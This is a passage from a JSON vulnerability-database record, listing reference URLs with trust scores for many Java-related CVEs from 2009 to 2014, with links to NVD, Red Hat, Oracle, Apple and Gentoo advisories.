"http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5824" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://www.oracle.com/technetwork/java/javase/releasenotes-136954.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2456" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2464" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2455" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2445.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2459" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1571" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2468" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2466" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2465" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2446" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2451" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2450" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2442" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2453" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2469" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2445" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1500" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5902.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2437" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2407" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2447" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2443" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2461.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2452" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5852.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2463" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5905.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5906.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5870" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5818" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5889" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0385" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2437" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3743" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5893" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3159" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3174" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5888" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0437" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0373" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5789" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1682" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5899" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5801" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5832" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1533" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2400" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3143" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0438" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5810" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5905" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201401-30.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5904" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5831" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3744" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5854" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2394" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0498" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5777" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0499" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0499" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0409" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4681" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2462" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5083" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0375" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2439" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3136" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0376" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5824" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3342" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5776" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0504" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0507" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5895" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0446" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-5035" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2418" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5788" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5887" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0418" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0368" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2425" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0500" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1722" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5902" 